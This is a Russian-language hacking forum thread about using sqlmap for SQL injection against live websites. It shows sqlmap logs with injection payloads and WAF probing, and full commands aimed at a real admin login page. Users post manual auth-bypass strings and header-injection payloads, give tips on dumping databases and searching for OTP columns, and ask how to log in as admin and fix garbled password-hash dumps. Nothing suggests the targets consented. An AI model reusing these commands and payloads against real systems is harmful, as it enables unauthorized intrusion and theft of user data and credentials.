[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'TrafficShield (F5 Networks)
'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'UrlScan (Microsoft)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'USP Secure Entry Server (Un
ited Security Providers)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Varnish FireWall (OWASP)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Wallarm Web Application Fir
ewall (Wallarm)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'WatchGuard (WatchGuard Tech
nologies)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'webApp.secure (webScurity)'

[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'WebKnight Application Firew
all (AQTRONIX)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Wordfence (Feedjit)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Yundun Web Application Fire
wall (Yundun)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Yunsuo Web Application Fire
wall (Yunsuo)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Zenedge Web Application Fir
ewall (Zenedge)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Generic (Unknown)'
[01:56:43] [CRITICAL] WAF/IPS/IDS identified as 'Generic (Unknown)'
[01:56:43] [WARNING] WAF/IPS/IDS specific response can be found in 'c:\users\art
em\appdata\local\temp\sqlmapuumtkb12408\sqlmapresp onse-opc2v1'. If you know the
details on used protection please report it along with specific response to 'dev
@sqlmap.org'
are you sure that you want to continue with further target testing? [y/N] y
[01:56:44] [WARNING] please consider usage of tamper scripts (option '--tamper')

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: EmailAddress=1' AND 3169=3169 AND 'pwZw'='pwZw
Vector: AND [INFERENCE]
---
[01:56:44] [INFO] testing MySQL
[01:56:44] [DEBUG] resuming configuration option 'code' (200)
[01:56:44] [INFO] confirming MySQL
[01:56:44] [INFO] the back-end DBMS is MySQL
[01:56:44] [INFO] fetching banner
[01:56:44] [INFO] resumed: 5.6.39-cll-lve
[01:56:44] [DEBUG] performed 0 queries in 0.00 seconds
web application technology: Apache, PHP 7.1.14
back-end DBMS: MySQL >= 5.0.0
banner: '5.6.39-cll-lve'
[01:56:44] [INFO] fetching tables for database: 'database'
[01:56:44] [INFO] fetching number of tables for database 'database'
[01:56:44] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[01:56:44] [PAYLOAD] 1' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_S
CHEMA.TABLES WHERE table_schema=0x6c617265636f696e5f616c6c5f757365727 3),1,1))>51
AND 'tjzX'='tjzX
[01:56:44] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:44] [WARNING] unexpected HTTP code '406' detected. Will use (extra) valid
ation step in similar cases
[01:56:44] [PAYLOAD] 1' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_S
CHEMA.TABLES WHERE table_schema=0x6c617265636f696e5f616c6c5f757365727 3),1,1))>48
AND 'tjzX'='tjzX
[01:56:44] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:44] [PAYLOAD] 1' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_S
CHEMA.TABLES WHERE table_schema=0x6c617265636f696e5f616c6c5f757365727 3),1,1))>9
AND 'tjzX'='tjzX
[01:56:44] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:44] [INFO] retrieved:
[01:56:44] [DEBUG] performed 3 queries in 0.51 seconds
[01:56:44] [WARNING] unable to retrieve the number of tables for database 'database'
[01:56:44] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] n
No tables found
[01:56:46] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times, 406 (Not Acceptable) - 6 times
[01:56:46] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some
kind of protection is involved (e.g. WAF)
[01:56:46] [INFO] fetched data logged to text files under 'C:\Users\user\.sqlma
p\output\url'



Waf обходить.

RedFern.89
16.04.2018, 01:23
BabaDook said:
↑ (https://antichat.live/posts/4202231/)
Waf обходить.


waf generic не разу с ним не сталкивался. под него вообще tamper есть в мапе?

LoginUserName
17.04.2018, 12:45
Мап криво сливает пароли, вот так $1$JJCSUHzQ$fJoUTRgTvE\\/6CsiTRtfFC. при том каждый раз в разных местах подставляет слэшы, как можно исправить проблему? Это md5(unix) хеш

Muracha
18.04.2018, 03:03
использую sqlmap для вывода таблиц методом POST

Очень смущает, что когда смотришь вручную там ошибка при поставки admin'


Code:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' LIMIT 2' at line 1


Или пользователь не найдет если подставлять:


Code:
username=" or ""="&" or ""="=admin&login=1

Sqlmap говорит вообще разные вещи


Как вывести таблицу или хотя бы авторизоваться админом?

И почему не выводится стандартными средствами sqlmap?




.SpoilerTarget" type="button">Spoiler: 1
root@kali:~# sqlmap -u http://advert.kp.ru/admin//index.php --data "username=admin&passw=admin&login=1" --threads 10 --random-agent --dbms=mysql


Code:
___
__H__
___ ___[.]_____ ___ ___ {1.1.12#stable}
|_ -| . ["] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

starting at 21:38:30

[21:38:30] [INFO] fetched random HTTP User-Agent header from file '/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060326 Firefox/1.5.0.3 (Debian-1.5.dfsg+1.5.0.3-2)'
[21:38:31] [INFO] testing connection to the target URL
[21:38:31] [INFO] testing if the target URL content is stable
[21:38:32] [INFO] target URL content is stable
[21:38:32] [INFO] testing if POST parameter 'username' is dynamic
[21:38:32] [INFO] confirming that POST parameter 'username' is dynamic
[21:38:32] [INFO] POST parameter 'username' is dynamic
[21:38:32] [INFO] heuristic (basic) test shows that POST parameter 'username' might be injectable (possible DBMS: 'MySQL')
[21:38:33] [INFO] testing for SQL injection on POST parameter 'username'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[21:38:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:38:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[21:38:45] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[21:38:46] [WARNING] reflective value(s) found and filtering out
[21:38:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)'
[21:39:07] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[21:39:20] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[21:39:32] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[21:39:44] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[21:39:56] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[21:40:09] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[21:40:22] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[21:40:35] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[21:40:35] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[21:40:36] [INFO] testing 'MySQL = 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[21:40:39] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[21:40:39] [INFO] testing 'MySQL = 5.0 boolean-based blind - Stacked queries'
[21:40:52] [INFO] testing 'MySQL = 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[21:41:10] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[21:41:18] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[21:41:26] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[21:41:33] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[21:41:41] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[21:41:49] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[21:41:56] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[21:42:04] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:42:12] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:42:19] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[21:42:27] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[21:42:35] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[21:42:42] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[21:42:50] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[21:42:57] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[21:43:03] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[21:43:03] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[21:43:04] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[21:43:04] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[21:43:04] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[21:43:04] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[21:43:04] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[21:43:04] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[21:43:05] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[21:43:05] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[21:43:05] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[21:43:06] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[21:43:06] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[21:43:06] [INFO] testing 'MySQL inline queries'
[21:43:06] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[21:43:13] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[21:43:20] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[21:43:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[21:43:33] [INFO] testing 'MySQL = 5.0.12 AND time-based blind'
[21:43:54] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[21:44:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (comment)'
[21:44:13] [INFO] POST parameter 'username' appears to be 'MySQL >= 5.0.12 AND time-based blind (comment)' injectable
[21:44:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[21:44:13] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[21:44:13] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[21:44:13] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[21:44:14] [INFO] target URL appears to have 5 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[21:44:56] [INFO] testing 'MySQL UNION query (30) - 21 to 40 columns'
[21:44:59] [INFO] testing 'MySQL UNION query (60) - 41 to 60 columns'
[21:45:02] [INFO] testing 'MySQL UNION query (30) - 61 to 80 columns'
[21:45:05] [INFO] testing 'MySQL UNION query (30) - 81 to 100 columns'
[21:45:08] [INFO] checking if the injection point on POST parameter 'username' is a false positive
[21:45:08] [WARNING] false positive or unexploitable injection point detected
[21:45:08] [WARNING] POST parameter 'username' does not seem to be injectable
[21:45:08] [INFO] testing if POST parameter 'passw' is dynamic
[21:45:08] [WARNING] POST parameter 'passw' does not appear to be dynamic
[21:45:08] [WARNING] heuristic (basic) test shows that POST parameter 'passw' might not be injectable

RWD
18.04.2018, 05:09
Muracha said:
↑ (https://antichat.live/posts/4202779/)
использую sqlmap для вывода таблиц методом POST
Очень смущает, что когда смотришь вручную там ошибка при поставки
admin'


Code:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' LIMIT 2' at line 1

Или
пользователь не найдет если подставлять:


Code:
username=" or ""="&" or ""="=admin&login=1

Sqlmap говорит вообще разные вещи

Как вывести таблицу или хотя бы авторизоваться админом?
И почему не выводится стандартными средствами sqlmap?


Spoiler: 1
root@kali:~# sqlmap -u
http://advert.kp.ru/admin//index.php
--data "username=admin&passw=admin&login=1" --threads 10 --random-agent --dbms=mysql

Code:
___
__H__
___ ___[.]_____ ___ ___ {1.1.12#stable}
|_ -| . ["] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

starting at 21:38:30

[21:38:30] [INFO] fetched random HTTP User-Agent header from file '/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060326 Firefox/1.5.0.3 (Debian-1.5.dfsg+1.5.0.3-2)'
[21:38:31] [INFO] testing connection to the target URL
[21:38:31] [INFO] testing if the target URL content is stable
[21:38:32] [INFO] target URL content is stable
[21:38:32] [INFO] testing if POST parameter 'username' is dynamic
[21:38:32] [INFO] confirming that POST parameter 'username' is dynamic
[21:38:32] [INFO] POST parameter 'username' is dynamic
[21:38:32] [INFO] heuristic (basic) test shows that POST parameter 'username' might be injectable (possible DBMS: 'MySQL')
[21:38:33] [INFO] testing for SQL injection on POST parameter 'username'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[21:38:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:38:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[21:38:45] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[21:38:46] [WARNING] reflective value(s) found and filtering out
[21:38:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)'
[21:39:07] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[21:39:20] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[21:39:32] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[21:39:44] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[21:39:56] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[21:40:09] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[21:40:22] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[21:40:35] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[21:40:35] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[21:40:36] [INFO] testing 'MySQL = 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[21:40:39] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[21:40:39] [INFO] testing 'MySQL = 5.0 boolean-based blind - Stacked queries'
[21:40:52] [INFO] testing 'MySQL = 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[21:41:10] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[21:41:18] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[21:41:26] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[21:41:33] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[21:41:41] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[21:41:49] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[21:41:56] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[21:42:04] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:42:12] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:42:19] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[21:42:27] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[21:42:35] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[21:42:42] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[21:42:50] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[21:42:57] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[21:43:03] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[21:43:03] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[21:43:04] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[21:43:04] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[21:43:04] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[21:43:04] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[21:43:04] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[21:43:04] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[21:43:05] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[21:43:05] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[21:43:05] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[21:43:06] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[21:43:06] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[21:43:06] [INFO] testing 'MySQL inline queries'
[21:43:06] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[21:43:13] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[21:43:20] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[21:43:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[21:43:33] [INFO] testing 'MySQL = 5.0.12 AND time-based blind'
[21:43:54] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[21:44:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (comment)'
[21:44:13] [INFO] POST parameter 'username' appears to be 'MySQL >= 5.0.12 AND time-based blind (comment)' injectable
[21:44:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[21:44:13] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[21:44:13] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[21:44:13] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[21:44:14] [INFO] target URL appears to have 5 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[21:44:56] [INFO] testing 'MySQL UNION query (30) - 21 to 40 columns'
[21:44:59] [INFO] testing 'MySQL UNION query (60) - 41 to 60 columns'
[21:45:02] [INFO] testing 'MySQL UNION query (30) - 61 to 80 columns'
[21:45:05] [INFO] testing 'MySQL UNION query (30) - 81 to 100 columns'
[21:45:08] [INFO] checking if the injection point on POST parameter 'username' is a false positive
[21:45:08] [WARNING] false positive or unexploitable injection point detected
[21:45:08] [WARNING] POST parameter 'username' does not seem to be injectable
[21:45:08] [INFO] testing if POST parameter 'passw' is dynamic
[21:45:08] [WARNING] POST parameter 'passw' does not appear to be dynamic
[21:45:08] [WARNING] heuristic (basic) test shows that POST parameter 'passw' might not be injectable



--data "username=admin&passw=admin&login=1" --threads 10 --random-agent --dbms=mysql -p username

or

--data "username=admin*&passw=admin&login=1" --threads 10 --random-agent --dbms=mysql

может быть waf или вообще обычная ошибка базы.

Muracha
18.04.2018, 10:08
Ни один из пунктов выше, увы не сработал. Интересно то что ради эксперемента вбил:


Code:
--level=1 --risk=1 --banner -v 3 --union-cols=1-66
--dbms="MySQL" --technique=EBU --identify-waf --no-cast

Которые в свою очередь так же не сработали.

LoginUserName
18.04.2018, 12:36
Никто не знает как мап заставить дампить не криво?

Muracha
18.04.2018, 14:20
LoginUserName said:
↑ (https://antichat.live/posts/4202873/)
Никто не знает как мап заставить дампить не криво?


Может дело не в sqlmap? я бы попробовал заюзать sqlmap из другой папки, из под kali linux или вообще не sqlmap - если все тоже самое, ну дело не в мапе.

cat1vo
18.04.2018, 15:17
LoginUserName said:
↑ (https://antichat.live/posts/4202873/)
Никто не знает как мап заставить дампить не криво?


Скорее всего это не sqlmap сливает "криво", а скрипт в котором найдена инъекция экранирует слеши. Попробуйте проверить руками вывод!


Muracha said:
↑ (https://antichat.live/posts/4202779/)
Sqlmap говорит вообще разные вещи

Как вывести таблицу или хотя бы авторизоваться админом?
И почему не выводится стандартными средствами sqlmap?


А вы пробовали вручную получить результат? Или кроме как через sqlmap работать с инъекцией в БД вы не умеете? sqlmap - не панацея!

Muracha
18.04.2018, 16:12
Делал


cat1vo said:
↑ (https://antichat.live/posts/4202911/)
Скорее всего это не sqlmap сливает "криво", а скрипт в котором найдена инъекция экранирует слеши. Попробуйте проверить руками вывод!
А вы пробовали вручную получить результат? Или кроме как через sqlmap работать с инъекцией в БД вы не умеете? sqlmap - не панацея!


Разумеется делал!

Перебрал сначала возможность авторизации при которой выдавалое сообщение "пользователь не найдет в базе данных".

Синтаксическая ошибка не высвечивалась. Уязвимое только поле "username", на passwd -ноль реакции.


Code:
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
'='
'LIKE'
'=0--+

Затем пытался подобрать таблицы методом order by и вручную union+select+1,2,3-- и тут я везде натыкался на саму ошибку:


Code:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' LIMIT 2' at line 1

Поэтому и возникает первоначальный вопрос: почему ручками вижу багу но не могу заюзать ,а sqlmap тоже вначале видит багу, а потом уже говорит - нет не бага...или дело здесь тоже не в нем.

BabaDook
18.04.2018, 16:41
Кидай сылку

LoginUserName
18.04.2018, 18:32
cat1vo said:
↑ (https://antichat.live/posts/4202911/)
Скорее всего это не sqlmap сливает "криво", а скрипт в котором найдена инъекция экранирует слеши. Попробуйте проверить руками вывод!
А вы пробовали вручную получить результат? Или кроме как через sqlmap работать с инъекцией в БД вы не умеете? sqlmap - не панацея!


К сожалению, в ручную не особо умею. Можете подсказать, как в ручную по этапно слить базу с такой уязвимость

Post данные


Code:
sasai=-1'%20OR%203*2*1=6%20AND%20000646=000646%20--%20

Буду благодарен

cna
18.04.2018, 22:16
$?пм или читай //threads/43966/ (https://antichat.live/threads/43966/)

исп норм соответствие урленкоде с --no-cast --hex --text-only кодировку можно указывать и енкодинг разный так же влияет при блиндах таймауты и конечно --drop-set-cookie --flush-session

Muracha
18.04.2018, 22:30
Code:
root@kali:~# sqlmap -u http://advert.kp.ru/admin//index.php --data "username=admin&passw=admin&login=1" --threads 10 --random-agent --dbms=mysql

Эвристический анализ сообщал об уязвимости, а -v 3 говорил неа.

Такой же результат был при


Code:
root@kali:~# sqlmap -u http://advert.kp.ru/admin//index.php --data "username=admin&passw=admin&login=1"
--level=1 --risk=1 --banner -v 3 --union-cols=1-66
--dbms="MySQL" --technique=EBU --identify-waf --no-cast

Использовал параметры не только на


Code:
http://advert.kp.ru/admin//index.phpно и на http://advert.kp.ru/admin//login.php

Во втором случае мне сразу говорил sqlmap, что уязвимость отсутствует.

Sensoft
19.04.2018, 16:54
Вытащил BD и когда прописую команду для того чтобы просмотреть tables он начинает заново крутить скулю, чё за нах ?

второй раз такая фигня как поставил последнюю версию sqlmap раньше не когда такого не было

LoginUserName
19.04.2018, 16:56
Sensoft said:
↑ (https://antichat.live/posts/4203286/)
Вытащил BD и когда прописую команду для того чтобы просмотреть tables он начинает заново крутить скулю, чё за нах ?
второй раз такая фигня как поставил последнюю версию sqlmap раньше не когда такого не было


Пропиши payload, с помощью которого залез в бд

x10
18.05.2018, 21:42
Друзья подскажите пожалуйста нашел уязвимость

A cookie has been set without the secure flag, which means that the cookie can be accessed via unencrypted connections.

Файл cookie установлен без безопасного флага, а это означает, что к файлу cookie можно получить доступ через незашифрованные соединения.

Как это реализовать?

x10
18.05.2018, 23:39
Не ругайте сторого куки эксплуатируются по запросу или по ответу сервера

Я только учусь =(

Sensoft
20.05.2018, 17:08
Как выглядит запрос для поиска по колонкам ?

Мне нужна колонка с названием OTP как будет выглядеть параметр для поиска ?

Shubka75
20.05.2018, 17:39
Sensoft said:
↑ (https://antichat.live/posts/4211190/)
Как выглядит запрос для поиска по колонкам ?
Мне нужна колонка с названием OTP как будет выглядеть параметр для поиска ?


--search -C OTP

Sensoft
28.05.2018, 01:19
Первый раз подобный отчёт об SQL

Как прописать запрос в SQLmap ?


Code:
GET / HTTP/1.1
Referer: http://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.28.0 Safari/5.21
Client-IP: -1' OR 3*2*1=6 AND 000358=000358 or 'tPXGszqn'='
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: localhost
Accept-Language: en
Via: 1.1 wa.www.test.com
Origin: http://www.test.com/
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=2vd8jk6geog2vc0jjem1bbre3g; 05b80234f058b57f104d29b9e=2a31939b37875a015fb294ff ca58d009
Host: site.com (тут сайт который я проверял)
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

BabaDook
28.05.2018, 01:26
Sensoft said:
↑ (https://antichat.live/posts/4213073/)
Первый раз подобный отчёт об SQL
Как прописать запрос в SQLmap ?

Code:
GET / HTTP/1.1
Referer: http://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.28.0 Safari/5.21
Client-IP: -1' OR 3*2*1=6 AND 000358=000358 or 'tPXGszqn'='
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: localhost
Accept-Language: en
Via: 1.1 wa.www.test.com
Origin: http://www.test.com/
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=2vd8jk6geog2vc0jjem1bbre3g; 05b80234f058b57f104d29b9e=2a31939b37875a015fb294ff ca58d009
Host: site.com (тут сайт который я проверял)
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*



--headers='client-ip:*'

Sensoft
28.05.2018, 01:41
BabaDook said:
↑ (https://antichat.live/posts/4213074/)
--headers='client-ip:*'




Code:
sqlmap -u https://sote.io/ --headers='client-ip:*' --dump --random-agent

